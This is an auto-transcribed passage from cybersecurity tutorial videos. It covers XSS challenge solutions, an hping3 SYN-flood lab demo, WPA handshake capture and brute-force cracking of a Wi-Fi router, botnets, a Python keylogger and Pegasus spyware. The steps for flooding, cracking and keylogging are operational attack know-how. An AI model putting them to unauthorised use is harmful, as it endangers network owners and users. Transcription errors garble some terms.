in the URL fragment this hints that the value after the hashtag controls the behavior of the page that is it is an input variable to confirm let’s analyze the code as you can see in line 43 inside the event handling the value provided after the hash in the URL is directly passed onto the true tab method no input validation is being performed the value passed to the choose tab method is directly injected into the img tag in line 17 this is an unsafe assignment and it is the vulnerable part of the code now all we have to do now is to craft a payload that would adjust the img tag to execute our JavaScript remember the script tag from level one would not work here since the variable HTML is used to add the DOM dynamically hence the events are aes here once again I will choose to use the existing img tag and change the source to something that doesn’t exist hence forcing it to fall in to execute an on error even which I will pass the URL once we visit that URL we can see that our Java pop-up has opened up here with the same message of XSS level 3 has been completed with this we can now move on to level four which is going to present a different kind of attack in this web application there is a timer on the page that means whatever numbers we put in the box a countdown starts and then when it finishes the application alerts that the countdown is finished and you can see the timer is a pop-up appearing over here and this resets the timer again now it is obvious that the value entered in the text box is transferred to the server over the timer parameter in the URL let us examine the code to see how the timer parameter is being handled we’re going to visit timer.html over here and we’re going to check over here in line 21 the start timer method is being called in the onload event however the timer parameter is being directly passed to the start timer method we need to perform a pop-up alert in the web application which escapes the content of the function start timer without baking the JavaScript code the parameter value is directly added to the start timer method without any filtering what we can try to do here is to inject an alert function to be executed inside the onload event along with the start timer method we’re going to remove this argument and put our script over here now when we press on create timer and we have a pop-up with the excss level four completed we can now move on to level five in this web application the application excss is different because this challenge description says cross-ite scripting isn’t just about correctly escaping data sometimes attackers can do bad things even without injecting new elements into the DOM it’s kind of open redirect cuz the attack payload is executed as a result of modifying the DOM environment in the victim’s browser this environment is used by the original client side script so that the client side code runs in an unexpected manner the vulnerability can be easily detected if the next link in the signup page is inspected the href attribute value of next link is confirm which is exactly the value of the next URL query parameter as you can see over here this means using the next query parameter can be used to inject a JavaScript code to the href attribute of the next link the following is the best way to do it as soon as the user clicks on the link the script will be triggered we’re going to press anything random and now that we click next we can see the XSS level five that we had provided in the URL as a parameter to the next variable since the value of next provided appears in a pop-up we can consider the attacker success and move on to the final level six in this web application it shows some of the external JavaScript is retrieved if you analyze the URL you can see that the script is loaded already the vulnerability lies within how the code handles the value after the hashtag if you check on line 45 the value right after the hashtag is taken as the gadget name and then in line 48 the value is directly passed on to the include gadget method and in the include gadget method that we can see over here you can see in line 18 a script tag is created and the URL gadget name parameter value is directly used as the source attribute of the script tag in line 28 this means we can completely control the source attribute of the script tag that is being created that is with this vulnerability we can inject our own JavaScript file into the code we can inject a URL of our own hosted JavaScript into the web application’s URL after the hashtag and the URL should not be using HTTPS but anything like that to bypass the regular expression for security checking going to remove the pre-tored URL and we’re going to load our own JavaScript file finally we have reached the end of our challenge completed six different varieties of crosscripting attacks and use different solutions for all of the six questions with work from home being the norm in today’s era people spend considerable amount of time on the internet often without specific measures to ensure a secure session apart from individuals organizations worldwide that host data and conduct business over the internet are always at the risk of a DDoS attack these DDoS attacks are getting more extreme with hackers getting easy access to the graph three of the six strongest DD dos attacks were launched in 2021 with the most extreme attack occurring just last year in 2020 lately cyber criminals have been actively seeking out new services and protocols for amplifying these DDoS attacks active involvement with hacked machines and botnets allow further penetration into the consumer space allowing much more elaborate attack campaigns apart from general users multinational corporations have also had their fair share of problems github a platform for software developers was the target of a DOS attack in 2018 widely suspected to be conducted by Chinese authorities this attack went on for about 20 minutes after which the systems were brought into a stable condition it was the strongest DOS attack to date at the time and made a lot of companies reconsider the security practices to combat such attacks even after years of experimentation TDOS attacks are still at large and can affect anyone in the consumer and corporate space hey everyone this is Babub from SimplyLearn and welcome to this video on what is a DOS attack let’s learn more about what is a DOS attack a distributed denial of service attack or DOS is when an attacker or attackers attempt to make it impossible for a service to be delivered this can be achieved by thwarting access to virtually anything servers devices services networks applications and even specific transactions within applications in a DOSS attack it’s one system that is sending the malicious data or requests a DOS attack comes from multiple systems generally these attacks work by drowning a system with requests for data this could be sending a web server so many requests to serve a page that it crashes under the demand or it could be a database being hit with a high volume of queries the result is available internet bandwidth CPU and RAM capacity become overwhelmed the impact could range from a minor annoyance from disrupted services to experiencing entire websites applications or even entire businesses taking offline more often than not these attacks are launched using machines in a botnet a botnet is a network of devices that can be triggered to send requests from a remote source often known as the command and control center the bots in the network attack a particular target thereby hiding the original perpetrator of the DOS campaign but how do these devices come under a botnet and what are the requests being made to the web servers let’s learn more about these and how do attack work a DOS attack is a two-phase process in the first phase a hacker creates a botnet of devices simply put a vast network of computers are hacked via malware ransomware or just simple social engineering these devices become a part of the botnet which can be triggered any time to start bombarding a system or a server on the instruction of the hacker that created the botnet the devices in these networks are called bots or zombies in the second phase a particular target is selected for the attack when the hacker finds the right time to attack all the zombies in the botnet network send these requests to the target thereby taking up all the servers available bandwidth these can be simple ping requests or complex attacks like SYN flooding and UDP flooding the aim is to overwhelm them with more traffic than the server or the network can accommodate the goal is to render the website or service inoperable there is a lot of wiggle room when it comes to the type of DOS attack a hacker can go with depending on the targets vulnerability we can choose one of the three broad categories of DOS attacks volume- based attacks use massive amounts of bogus traffic to overwhelm a resource it can be a website or a server they include ICMP UDAP and spoofed packet flood attacks the size of volume based attack is measured in bits per second these attacks focus on clogging all the available bandwidth for the server thereby cutting the supply short several requests are sent to the server all of which warrant a reply thereby not allowing the target to cater to the general legitimate users next we have the protocol level attacks these attacks are meant to consume essential resources of the target server they exhaust the load balances and firewalls which are meant to protect the system against the DOS attacks these protocol attacks include SY and floods and Smurf DDoS among others and the size is measured in packets per second for example in an SSL handshake server replies to the hello message sent by the hacker which will be the client in this case but since the IP is spoofed and leads nowhere the server gets stuck in an endless loop of sending the acknowledgement without any end in sight finally we have the application level attacks application layer attacks are conducted by flooding applications with maliciously crafted requests the size of application layer attacks is measured in requests per second these are relatively sophisticated attacks that target the application and operating system level vulnerabilities they prevent the specific applications from delivering necessary information to users and hog the network bandwidth up to the point of a system crash examples of such an attack are HTTP flooding and BGP hijacking a single device can request data from a server using HTTP post or get without any issues however when the requisite botnet is instructed to bombard the server with thousands of requests the database bandwidth gets jammed and it eventually becomes unresponsive and unusable but what about the reasons for such an attack there are multiple lines of thought as to why a hacker decides to launch a DOS attack on unsuspecting targets let’s take a look at a few of them the first option is to gain a competitive advantage many DOS attacks are conducted by hacking communities against rival groups some organizations hire such communities to stagger their rivals resources at a network level to gain an advantage in the playing field since being a victim of a DOS attack indicates a lack of security the reputation of such a company takes a significant hit allowing the rivals to cover up some ground secondly some hackers launch these DOS attacks to hold multinational corporations at ransom the resources are jammed and the only way to clear the way is if the target company agrees to pay a designated amount of money to the hackers even a few minutes of inactivity is detrimental to a company’s reputation in the global market and it can cause a spiral effect both in terms of market value and product security index most of the time a compromise is reached and the resources are freed after a while dos attacks have also found use in the political segment certain activists tend to use DOS attacks to voice their opinion spreading the word online is much faster than any local rally or forum primarily political these attacks also focus on online communities ethical dilemmas or even protests against corporations let’s take a look at a few ways that companies and individuals can protect themselves against DOS attacks the company can employ load balances and firewalls to help protect the data from such attacks load balances reroute the traffic from one server to another in a DOS attack this reduces the single point of failure and adds resiliency to the server data a firewall blocks unwanted traffic into a system and manages the number of requests made at a definite rate it checks for multiple attacks from a single IP and occasional slowdowns to detect a DOS attack in action early detection of a DOS attack goes a long way in recovering the data lost in such an event once you’ve detected the attack you will have to find a way to respond for example you will have to work on dropping the malicious DOS traffic before it reaches your server so that it doesn’t throttle and exhaust your bandwidth here’s where you will filter the traffic so that only legitimate traffic reaches the server by intelligent routing you can break the remaining traffic into manageable chunks that can be handled by your cluster resources the most important stage in DOS mitigation is where you will look for patterns of DDoS attacks and use those to analyze and strengthen your mitigation techniques for example blocking an IP that’s repeatedly found to be offending is a first step cloud providers like Amazon Web Services and Microsoft Azure who offer high levels of cyber security including firewalls and threat monitoring software can help protect your assets and network from DDoS criminals the cloud also has greater bandwidth than most private networks so it is likely to fail if under the pressure of increased TOS attacks additionally reputable cloud providers offer network redundancy duplicating copies of your data systems and equipment so that if your service becomes corrupted or unavailable due to a DOS attack you can switch to a secure access on backed up versions without missing a beat one can also increase the amount of bandwidth available to a host server being targeted since DOS attacks fundamentally operate on the principle of overwhelming systems with heavy traffic simply provisioning extra bandwidth to handle unexpected traffic spikes can provide a measure of protection this solution can prove expensive as a lot of that bandwidth is going to go unused most of the time a content delivery network or a CDN distributes your content and boosts performance by minimizing the distance between your resources and end users it stores the cached version of your content in multiple locations and this eventually mitigates DOS attacks by avoiding a single point of failure when the attacker is trying to focus on a single target popular CDNs include Accom My CDN Cloudflare AWS CloudFront etc let’s start with a demo regarding the effects of DOS attacks on a system for a demo we have a single device that will attack a target making it a DOS attack of sorts once a botnet is ready multiple devices can do the same and eventually emulate a DOS attack to do so we will use the virtualization software called VMware with an instance of Parrot Security operating system running for a target machine we will be running another VMware instance of a standard Linux distribution known as Linux light in a target device we can use Wireshark to determine when the attack begins and see the effects of the attack accordingly this is Linux light which is our target machine and this is parrot security which is used by the hacker when trying to launch a DOS attack this is just one of the dros that can be used to launch the attack we must first find the IP address of our target so to find the IP address we open the terminal we use the command if config and here we can find the IP address now remember we’re launching this attack in VMware now the both the instances of parrot security and Linux light are being run on my local network so the address that you can see here is 192.168.72.129 which is a private address this IP cannot be accessed from outside the network basically anyone who is not connected to my Wi-Fi when launching attacks with public servers or public addresses it will have a public IP address that does not belong to the 1921 168 subnet once we have the IP address we can use a tool called Hping 3 hping 3 is an open-source packet generator and analyzer for the TCP IP protocol to check what are the effects of an attack we will be using Wireshark wireshark is a network traffic analyzer we can see whatever traffic that is passing through the Linux light distro is being displayed over here with the IP address the source IP and the destination IP as to where the request is being transferred to once we have the DOSS attack launched you can see the results coming over here from the source IP which will be par security now to launch the HP3 command we need to give pseudo access to the console which is the root access now we have the root access for the console the hping 3 command will have a few arguments to go with it which are as you can see on the screen minus s and a flood a hyphen v hyphen p8 and the IP address of the target which is 192.16872.129 in this command we have a few arguments that such as the minus s which specifies SYN packets like in an SSL handshake we have the SYN request that the client sends to the server to initiate a connection the hyphen flood aims to ignore the replies that the server will send back to the client in response to the SYN packets here the parrot security OS is the client and Linux slide being the server minus V stands for verbosity as in where we will see some output when the requests are being sent the hyphen P80 stands for port 80 which we can replace the port number if we want to attack a different port and finally we have the IP address of our target as of right now if we check wireshark it is relatively clear and there is no indication of a DOS attack incoming now once we launch the attack over here we can see the uh requests coming in from this IP which is 192.168 72.128 till now even the network is responsive and so is Linux light the requests keep on coming and we can see the HTTP flooding has started in flood mode after a few seconds of this attack continuing the server will start shutting down now remember Linux light is a distro that can focus on and that serves as a backend now remember Linux light is a distro and such Linux distros are served as backend to many servers across the world for example a few seconds have passed from the attack now the system has become completely irresponsive this has happened due to the huge number of requests that came from pirate security you can see whatever I press nothing is responded even the wireshark has stopped capturing new requests because the CPU usage right now is completely 100% and at this point of time anyone who is trying to request some information from this Linux distro or where this Linux distro is being used as a backend for a server or a database cannot access anything else the system has completely stopped responding and any request any legitimate request from legitimate users will be dropped once we stop the attack over here it takes a bit of time to settle down now remember it’s still out of control but eventually the traffic dies down and the system regains its strength it is relatively easy to gauge right now the effect of a DOSS attack now remember this Linux light is just a VM instance actual website servers and web databases they have much more bandwidth and are very secure and it is tough to break into that is why we cannot use a single machine to break into them that is where a DOS attack comes into play what we did right now is a DOS attack as in a single system is being used to penetrate a target server using a single request now when a DOS attack multiple systems such as multiple pirate security instances or multiple zombies or bots in a botnet network can attack a target server to completely shut down the machine and drop any legitimate requests thereby rendering the service and the target completely unusable and inoperable as a final note we would like to remind that this is for educational purposes only and we do not endorse any attacks on any domains only test this on servers and networks that you have permission to test on cyber security has become one of the most rigid industries in the last decade while simultaneously being the most challenged with every aspect of corporate culture going online and embracing cloud computing there is a plethora of critical data circulating through the internet all worth billions of dollars to the right person increasing benefits require more complex attacks and one of these attacks is a brute force attack a brute force or known as brute force cracking is the cyber attack equivalent of trying every key on your key ring and eventually finding the right one brute force attacks are simple and reliable there is no prior knowledge needed about the victim to start an attack most of the systems falling prey to brute force attacks are actually well secured attackers let a computer do the work that is trying different combinations of usernames and passwords until they find a one that works due to this repeated trial and error format the strength of password matters a great deal although with enough time and resources brute force will break a system since they run multiple combinations until they find the right passcode hey everyone this is Beub from Simply Learn and welcome to this video on what is a brute force attack let’s begin with learning about brute force attacks in detail a brute force attack also known as an exhaustive search is a cryptographic hack that relies on guessing possible combinations of targeted password until the current password is discovered it can be used to break into online accounts encrypted documents or even network peripheral devices the longer the password the more combinations that will need to be tested a brute force attack can be time-conuming and difficult to perform if methods such as data offiscation are used and at times downright impossible however if the password is weak it could merely take seconds with hardly any effort dictionary attacks are an alternative to brute force attacks where the attacker already has a list of usernames and passwords that need to be tested against the target it doesn’t need to create any other combinations on its own dictionary attacks are much more reliable than brute force in a real world context but the usefulness depends entirely on the strength of passwords being used by the general population there is a three-step process when it comes to brute forcing a system let’s learn about each of them in detail in step one we have to settle on a tool that we are going to use for brute forcing there are some popular names on the market like Hashcat Hydra and John the Ripper while each of them has its own strength and weaknesses each of them perform well with the right configuration all of these tools come pre-installed with certain Linux distributions that cater to penetration testers and cyber security analysts like Kali Linux and Parrot Security after deciding what tool to use we can start generating combinations of alpha numeric variables whose only limitation is the number of characters for example while using Hydra a single six-digit password will create 900,000 passwords with only digits involved add alphabets and symbols to that sample space and that numbers grows exponentially the popular tools allow customizing this process let’s say the hacker is aware of the password being a specific 8digit word containing only letters and symbols this will substantially increase the chances of being able to guess the right password since we remove the time taken to generate the longer ones we omit the need for including digits in such combinations these small tweaks go a long way in organizing an efficient brute force attack since running all the combinations with no filters will dramatically reduce the odds of finding the right credentials in time in the final step we run these combinations against the file or service that is being broken we can try and break into a specific encrypted document a social media account or even devices at home that connect to the internet let’s say there is a Wi-Fi router the generated passwords are then fed into the connection one after the other it is a long and arduous process but the work is left to the computer other than someone manually clicking and checking each of these passcodes any password that doesn’t unlock the router is discarded and the brute force tool simply moves on to the next one this keeps going on until we find the right combination which unlocks the router sometimes reaching the success stage takes days and weeks which makes it cumbersome for people with low computing power at their disposal however the ability to crack any system in the world purely due to bad password habits is very appealing and the general public tends to stick with simple and easy to use passwords now that we have a fair idea about how brute force works let’s see if we can answer this question we learned about how complex passwords are tougher to crack by brute force among the ones listed on the screens which one do you believe will take the longest to be broken when using brute force tools leave your answers in the comment section and we will get back to you with the correct option next week let’s move on to the harmful effects of getting a system compromised due to brute force attacks a hacked laptop or mobile can have social media accounts logged in giving the hackers free access to the victim’s connections it has been reported on multiple occasions where compromised Facebook accounts are sending malicious links and attachments to people on their friends list one of the significant reasons for hacking malware infusion is best done when spread from multiple devices similar to distributing spam this reduces the chance of circling back the source to a single device which belongs to the hacker once brute forced a system can spread malware via email attachments sharing links file upload via FTP etc personal information such as credit card data usage habits private images and videos are all stored in our systems be it in plain format or root folders a compromised laptop means easy access to these information that can be further used to impersonate the victim regarding bank verification among other things once a system is hacked it can also be used as a mail server that distributes spam across lists of victims since the hacked machines all have different IP addresses and MAC addresses it becomes challenging to trace the spam back to the original hacker with so many harmful implications arising from a brute force attack it’s imperative that the general public must be protected against such let’s learn about some of the ways we can prevent ourselves from becoming a victim of brute force attacks using passwords consisting of alphabets letters and numbers have a much higher chance of withstanding brute force attacks thanks to the sheer number of combinations they can produce the longer the password the less likely it is that a hacker will devote the time and resources to brute force them having alpha numeric passwords also allows the user to keep different passwords for different websites this is to ensure that if a single account or password is compromised due to a breach or a hack the rest of the accounts are isolated from the incident two-factor authentication involves receiving a one-time password on a trusted device before a new login is allowed this OTP can be obtained either via email SMS or specific 2FA applications like AI and ages email and SMS-based OTPs are considered relatively less secure nowadays due to the ease with which SIM cards can be duplicated and mailboxes can be hacked applications that are specifically made for 2FA coursees are much more reliable and secure captures are used to stop bots from running through web pages precisely to prevent brute forcing through their website since brute force tools are automated forcing the hacker to solve capture for every iteration of a password manually is very challenging the capture system can filter out these automated bots that keep refreshing the page with different credentials thereby reducing the chances of brute force considerably a definite rule that locks the account being hacked for 30 minutes after a specified number of attempts is a good way to prevent brute force attempts many websites lock account for 30 minutes after three failed password attempts to secure the account against any such attack on an additional note some websites also send an email instructing the user that there have been three insecure attempts to log into the website let’s look at a demonstration of how brute force attacks work in a real world situation the world has gone wireless with Wi-Fi taking the reigns in every household it’s natural that the security will always be up for debate to further test the security index and understand brute force attacks we will attempt to break into the password of a Wi-Fi router for that to happen we first need to capture a handshake file which is a connection file from the Wi-Fi router to a connecting device like a mobile or a laptop the operating system used for this process is paral a Linux distribution that is catered to penetration testers all the tools being used in this demo can easily be found pre-installed in this operating system if getting your learning started is half the battle what if you could do that for free visit Skill Up by SimplyLearn click on the link in the description to know more to start our demo we’re going to use a tool called AirDon which is made to hack into wireless network specifically at this point it’s going to check for all the necessary scripts that are installed in the system to crack into a Wi-Fi and to capture the handshake file we’re going to need an external network card the significance of the external network card is a managed mode and a monitor mode for now the WLX1 named card is my external network adapter which I’m going to select to be able to capture data over the air we’re going to need to put it in monitor mode as you can see above it’s written it is in manage mode right now so we’re going to select option two which is to put the interface in monitor mode and it name is now WLAN zero monitor the monitor mode is necessary to capture data over the air that is the necessary reason why we need an external card since a lot of inbuilt cards that come with the laptops and the systems they cannot have a monitor mode installed once we select the mode we can go into the fifth which is the handshake tools menu in the first step we have to explore for targets and it is written that monitor mode is necessary to select a target so let’s explore for targets and press enter we have to let this run for about 60 seconds to get a fair idea about the networks that are currently working in this locality for example this ESS ID is supposed to be the Wi-Fi name that we see when connecting to a network j24 recover me these are all the names that we see on our mobile when trying to search for the Wi-Fi this BSS ID is supposed to be an identifier somewhat like a MAC address that identifies this network from other devices the channels features on one or two or there are some many channels that the networks can focus on this here is supposed to be a client that is connected to one such network for example the station that you can see 5626 this is supposed to be the MAC address of the device that is connected to a router this BSS ID is supposed to be which Wi-Fi it is connected to for example 5895D8 is this one which is the JO24 router so we already know which router has a device connected to it and we can use our attack to capture this handshake now that we it has already run for 1 minute now that we press Ctrl C we will be asked to select a target see it has already selected the number five which is the JO24 router as the one with clients so it is easy to run an attack on and it is easy to capture a handshake for select network 5 and we run a capture handshake it says we have a valid WPA WPA2 network target selected and that the script can continue now to capture the handshake we have a couple of attacks a do or a do air replay attack what this attack does is kick the clients out of the network in return when they try to reconnect to the Wi-Fi as they are configured that way that when a client is disconnected it tries to reconnect it immediately it tries to capture a handshake file which in turn contains the security key which is necessary to initiate the handshake for our demo let’s go with the second option that is the do a air replay attack select a timeout value let’s say we give it 60 seconds and we start the script we can see it capturing data from the JO24 network and here we go we have the WPA handshake file once the handshake file is captured can actually close this and here we go congratulations in order to capturing a handshake it has verified that a PMK ID from the target network has successfully been captured this is the file that is already stored it’s a cap file for the path we can let’s say we can keep it in a desktop okay we give the path and the handshape file is generated we can already see a target over here same Jio24 router with the BSS ID now if we return to its main menu we already have the handshake file captured with us now our job is to brute force into that handshake capture file the capture file is often encrypted with the security key of the Wi-Fi network if we know how to decrypt it we will automatically get the security key so let’s go to the offline WPAWP to decrypt menu since we’ll be cracking personal networks we can go with option one now to run the brute force tool we have two options either we can go with the air crack or we can go with the hashcat let’s go with air plus crunch which is a brute force attack against a handshake file we can go with option two it can already detect the capture file that we have generated so we select yes the DSS ID is the one which denotes the GO24 router so we’re going to select yes as well the minimum length of the key for example it has already checked that the minimum length of a Wi-Fi security key which is a WPA to PSK key will always be more than 8 digits and below 64 digits so we have to select something in between this range so if we already know let’s say that the password is at least 10 digits we can go with the minimum length as 10 and as a rough guess let’s say we put the maximum length as 20 the character set that we’re going to use for checking the password will affect the time taken to brute force for example if we already know that or we have seen a user use a password while connecting to the router as something that has only numbers and symbols then we can choose accordingly let’s say if you go with only uppercase characters and numeric characters go with option seven and it’s going to start decryting so how aircraft is working right here you can see this passphrase over here the first five or six digits are a it starts working its way from the end from the last character it keeps trying every single combination you can see the last the fourth character from the right side the D it’ll eventually turn to E because it keeps checking up every single character from the end this will keep going on until all the single characters are tested and every single combination is tried out since the handshake file is encrypted using the security key that is the WPA2 key of the router whichever passphrase is able to decrypt the handshake key completely will be the key of the Wi-Fi router this is the way we can brute force into Wi-Fi routers anywhere in the world cyber attacks are frequently making headlines in today’s digital environment at any time everyone who uses a computer could become a victim of a cyber attack there are various s of cyber attacks ranging from fishing to password attacks in this video we’ll look into one such attack that is known as botnet but before we begin if you love watching tech videos subscribe to our channel and hit the bell icon never to miss an update to begin with let’s take a look at some of the famous bot attacks the first one is mai botnet which is a malicious program designed to attack vulnerable IoT devices and infect them to form a network of bots that on command perform basic and medium level denial of service attacks then we have the zeus bot specifically designed for attacking the system for bank related information and data now let’s see what exactly a botnet is botnet refers to a network of hijacked interconnected devices that are installed with malicious codes known as malware each of these infected devices are known as bots and the hijack criminal known as bot hoarder remotely controls them the bots are used to automate large scale attacks including data theft server failure malware propagation and denial of service attacks now that we know what exactly a botnet is let’s dive deeper into learning how a botnet works during the preparation of a botnet network the first step involves preparing the botnet army after that the connection between the botnet army and the control server is established and the end the launching of the attack is done by the boter let’s understand through a illustration firstly we have a boter that initiates the attack according to the control server commands the devices that are infected with the malware programs and begins to attack the infected system let’s see some details regarding the preparation of the botnet army the first step is known as the prepping the botnet army the first step is creating a botnet is to infect as many as connected devices as possible this ensures that there are enough bots to carry out the attack this way it creates bots either by exploiting the security gaps in the software or websites or using fishing attacks they are often deployed through Trojan horses for the next step we have establishing the connection once it hacks a device as per previous step it infects it with a specific malware that connects the device back to the control bot server a bot herder uses command programming to drive the bot’s actions and the last step is known as launching the attack once infected a bot allows access to admin level operation like gathering and stealing of data reading and rewriting the system data monitoring user activities performing denial of service attacks including other cyber crimes now let’s take a look at the botnet architecture the first type is known as client server model the client server model is a traditional model that operates with the help of a command and control center server and communication protocols like IRC when the boter issues a command to the server it is then relayed to the clients to perform malicious actions then we have peer-to-peer model here controlling the infected bots involves a peer-to-peer network that relies on a decentralized approach that is the ports are topological interconnected and acts as both C and C servers that is the server and the client today hackers adopt this approach to avoid detection and single point failure in the end we will see some points on some counter measure against botnet attacks the first step is to have updated drivers and system updates after that we should avoid clicking random pop-ups or links that we often see on the internet and lastly having certified antivirus anti-spyware softares and firewall installed into a system will protect against malware attack the internet is an endless source of information and data still in some cases we come across some occurrences like cyber attacks hacking force entry which may affect a time on the web hi everyone and welcome to the simply learn channel today we will discuss a topic that secretly records our input data that is known as key loggers but before we begin if you like watching tech videos subscribe to our channel and hit the bell icon to never miss an update to understand the key logging problem better let’s take a look at an example this is June she works in a business firm where she manages the company’s data regularly this is Jacob from the information department who’s here to inform her about some of the security protocols during the briefing she informed him about some of the problems her system was facing with which included slow reaction speed and unusual internet activity as Jacob heard about the problems with the system he thinks of the possibility what could be the reason behind these problems her system was facing with the conclusion that he came across was the key logging issue with unknown to the problem her system was facing with she asked him about some of the details regarding it for today’s topic we learn what exactly key loggers are and how they affect our system what are the harmful effects that key logging can bring into the system to begin with we learn what exactly the key logging program is as the name suggests key logger is a malicious program or a tool that is designed to record keystrokes that are typed during data input and record them into a lock file then the same program secretly sends these log files to its origin where they can be used for malicious acts by the hacker now that we know what the key logging program is let’s take a look how they enter into the system searching for a suitable driver for a system can often lead to the installation of the key logging program into the system if we often visit suspicious sites and uncertified software are installed into our system then if we use unknown links or visiting unknown websites which come through unknown addresses can also be a reason behind the key logging issue entering into the system and lastly there are often cases where different pop-ups that we often see on social sites or different media sites can lead to the installation of key logging program into a system now that we know how the problem gets into the system let’s take a look how to identify whether the system is infected by the key logging issue the key locking issue can be identified if there are often cases when a keyboard lags behind the system the data that we enter sometimes is stuck in between when we type through the input then there are cases when the system freeze occurs unknowingly to what exactly could be the reason behind them and also there are delayed reaction time for different applications that run on the system and lastly there are different cases when we often see suspicious internet activity on the system that we don’t know about this could lead to the identification of a problem into the system now we’ll take a look at different types of key loggers that are present on the net which can harm a system differently the first problem that key loggers arouse is API based the most common key logging case which uses APIs to keep a log of the type data and share it to its origin for malicious purposes each time we press a key the key logger intercepts the signal and logs it then we have form grabbing based key loggers as the name suggests they are a based key loggers that store the form data that is if we often use web forms or different kinds of forms to enter different data they can be recorded into the system by the program and send it to its origin then we have kernelbased key loggers these key loggers are installed deeply into the operating system where they can hide from different antivirus if not checked properly and they record the data that we type on the keyboard and send it to its origin and lastly we have hardware key loggers these key loggers are present directly into the hardware that is they are embedded into system where they record the data that we type on the keyboard now let’s take a look how hackers differentiate different type of recorded data and exploit them when hackers receive information about the target they might use it to blackmail the target which may affect the personal life of the target and also blackmail them for different money related issues then in case of company data that is recorded by the key logging program can also affect the economic value of the company in the market which may lead to the downfall of the company also in some cases the key logging program can also log data about military secrets which may include nuclear codes or security protocols which are necessary to maintain the security of a country now let’s take a look whether mobile devices get infected with the key logging issue or not in the case of hand devices infection of key loggers are low in comparison to the computer systems as they use onscreen keyboard or virtual keyboard but in some cases we often see different kinds of malicious programs getting installed into the hand device if we often visit different uncertified websites or illegal websites or torrent sites and also the device that is infected with the key logging issue or different kind of malicious program can often lead to the exploitation of data that includes photos emails or important files by the hacker or the cyber criminal that installed the particular malicious program into the system now to prevent our system from getting infected by the key locking program let’s take a look at different points the first point includes using of different antivirus softares or

    tools which can prevent the entering of malicious program into the system then keeping system security protocols regularly updated is also a good habit and lastly using virtual keyboard to input our sensitive data which may include bank details login details or different passwords related to different websites now that we have some understanding about the topic of key loggers let’s take a look at the demo to further increase the knowledge about the topic for the first step we have to download some of the important libraries that are required into the system which is this library now we’ll run it the system says the library is already installed into the system now let’s take a look what exactly modules are required from the particular library from this library we’ll import the keyboard module which will help us to record the data that we type on the keyboard now from the same we’ll also import key module and the listener module and also the logging module which will help us to record the data into a log file for the next part we’ll write a piece of code that will allow us to save the data that is recorded by the program into a text file that will be named as key log text file along with the date and time stamp let’s take a look now we’ll provide it with the file name that will be given as key log dot txt file and also so the part where the format of the data is recorded put the brackets over here to contain the file name now we’ll write the format in which the data will be recorded into the log file which will be given as the format would be the message and the time stamp which would be given as along the time stamp given as percentage and ending it with the bracket now for the next step we’ll design two of the functions that will be used into the program that will be termed as wild press function and while release function let’s take a look while press function would be a function that will come into play when the keyboard key has been pressed is pressed and This would go for the format that we designed in the above line and logging the pressed key info a string file to be recorded into the LO file now now we’ll design a function that is while release that will come into play when the escape key has been pressed that is the program will terminate itself and the program will stop from running and in the end we require for the functioning of the program to loop these functions that is while press and while deletes to continue its cycle that will be going for while press and on release will contain while release function as listener and now this part would join the different threads and store them into the LO file now that we have completed the code for the program let’s run it we have to wait for a moment so the program runs it now to verify the program let’s open notepad and on the notepad we’ll write hello world which will be the basic whether the program is working or not let’s take a look and we’ll go for the main page on Jupyter notebook and refresh the page go to the bottom over here we see the key log text that is the text file that we created let’s open it and over here we have the data that is created as we started with note then this is the hello world part that we created just now which shows that the program we created is working properly now that we have reached the end of the module let’s take a look at the summary firstly we learned what exactly key loggers are then we understood what different modes are present how the system get infected with a key logging problem then we learned how to detect the problem into our system then we learned what different types of key loggers are present on the net we also understood how hackers use the recorded data from the program and we also learned whether mobile devices get infected with the key logging problem or not and lastly we understood what different points can be taken to prevent the entering of the key logging problem into the system and before we begin if you are someone who is interested in building a career in cyber security or to become an ethical hacker by graduating from the best universities or a professional who elicits to switch career with cyber security or ethical hacker by learning from the experts then try using a short to simply learn postgraduate program in cyber security with modules from MIT Schwarzman College of Computing the course link is mentioned in the description box below that will navigate you to the course page where you can find a complete overview of the program being offered before we learn about the Pegasus platform let us understand what spyware is and its working spyware is a category of malware that can gather information regarding a user or a device straight from the host machine it is mostly spread by malicious links via email or chat applications when a link with the malware is received clicking on this link will activate the spyware which allows the hacker to spy on all our user information with some spyware systems even clicking on the link isn’t necessary to trigger the malicious payload this can ultimately cause security complications and further loss of privacy one such spyware system that is making the rounds in the tech industry today is Pegasus the Pegasus is a spyware system developed by an Israeli company known as the NSO group it runs on mainly mobile devices spanning across the major operating systems like the Apple’s iOS on iPhone and the standard Android versions this is not a newly developed platform since Pegasus has existed since as early as 2016 a highly intricate spyway program that can track user location read text messages scan through mobile files access device camera and microphone to record voice and video pegasus has all the tools necessary to enforce surveillance for any client that wishes to buy its services initially the NSO group had designed the software to be used against terrorist factions of the world with more and more encrypted communication channels coming to the forefront Pegasus was designed to maintain control over the data transmission that can be a threat to national security unfortunately the people who bought the software had complete control over who how and up to what level they can put surveillance limits on eventually the primary clients became sovereign nations spying on public information that is supposed to stay private became really easy with this service multiple devices can be affected with the same spyware system to create a network information this network keeps feeding data to the host to understand how a network can be created let’s know how a mobile device can be affected by Pegasus we all communicate with friends and family over instant messaging applications and email in some instances if you check your inbox on a regular basis you must have noticed that we receive some spam emails that the mail providers like Gmail and Yahoo can just filter into the spam folder some of these messages bypass this filter and make their way into a person’s inbox they look like generic emails which are supposed to be safe the Pegasus spyware targets such occurrences bypassing malicious messages and links which install the necessary spy software on the user’s mobile device be it Android or an iPhone this isn’t unique to the email ecosystem since it’s equally likely to be targeted by SMS text WhatsApp Instagram or even the most secure messaging apps like Signal and Threma once the malicious links are clicked a spyware package is downloaded and installed on the device after the spyware is successfully installed the perpetrator who sent the payload to the victim can monitor everything the user does pegasus can collect private emails passwords images videos and every other piece of information that passes through the device network all this data is transmitted back to the central server where the primary spying organization can monitor the activities at a granular level this is not even surface level since complex spyware software like Pegasus can access the root files on our mobiles these root files hold information that is crucial to the working of the Android and iOS operating systems leaking such private information is a massive blow to the security and the privacy of an individual the information that may seem trivial like the name of your Wi-Fi connection or the last time you ordered an item from Amazon are indeed all valuable information this exploitation is primarily possible due to the zeroday vulnerabilities known as bugs in the software development process the zeroday bugs are the ones that have just been discovered by some independent security company or a researcher once they are found reporting these vulnerabilities to the developer of the platform which would be either Google for Android or Apple for iOS is the right thing to do however many such critical bugs make their way onto the dark web where hackers can use them to create exploits these exploits are then sent to innocent users with a link or a message like we had discussed before Pegasus was able to affect the latest devices with the all the security patches installed but some bugs are not reported to the developers or just cannot be fixed without breaking some core functionality these become the gateway for spyware to enter into the system you can never be 100% safe but you sure can give it all in protecting yourself the one thing where 